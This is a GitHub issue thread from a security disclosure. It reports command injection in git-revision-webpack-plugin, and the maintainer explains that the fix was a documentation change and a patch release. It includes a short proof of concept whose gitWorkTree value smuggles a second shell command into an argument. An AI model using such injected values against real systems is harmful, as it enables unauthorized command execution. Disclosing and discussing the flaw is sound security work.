search

pirelenito / git-revision-webpack-plugin

🏗 Webpack plugin that generates VERSION and COMMITHASH files during build
https://www.npmjs.com/package/git-revision-webpack-plugin
MIT License
358 stars 48 forks source link

huntr.dev - Command Injection #49

Closed huntr-helper closed 4 years ago

huntr-helper commented 4 years ago

Vulnerability Description

The function commithash within lib/helpers/run-git-command.js takes user input, and is passed to the gitCommand argument without any sanitization.

Steps To Reproduce:

var Root = require("git-revision-webpack-plugin");
var opt = {
"gitWorkTree": "& echo vulnerable > create.txt &"
 }
var root = new Root(opt);
root.commithash();

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

pirelenito commented 4 years ago

Got in touch with npm regarding this report and we've agreed that this is not an issue:

We agree with your assessment and agree that only very unusual usage of the package would lead to an exploitable scenario.

I've updated the package documentation to state that it should not "accept arbitrary user input": c09f1131f2308c6b4cf2efb1d9d608d245dd6f37 and released a new patch: https://github.com/pirelenito/git-revision-webpack-plugin/releases/tag/v3.0.5

JamieSlome commented 4 years ago

@pirelenito - thanks for clarifying with NPM and the new release! 🍰 🎉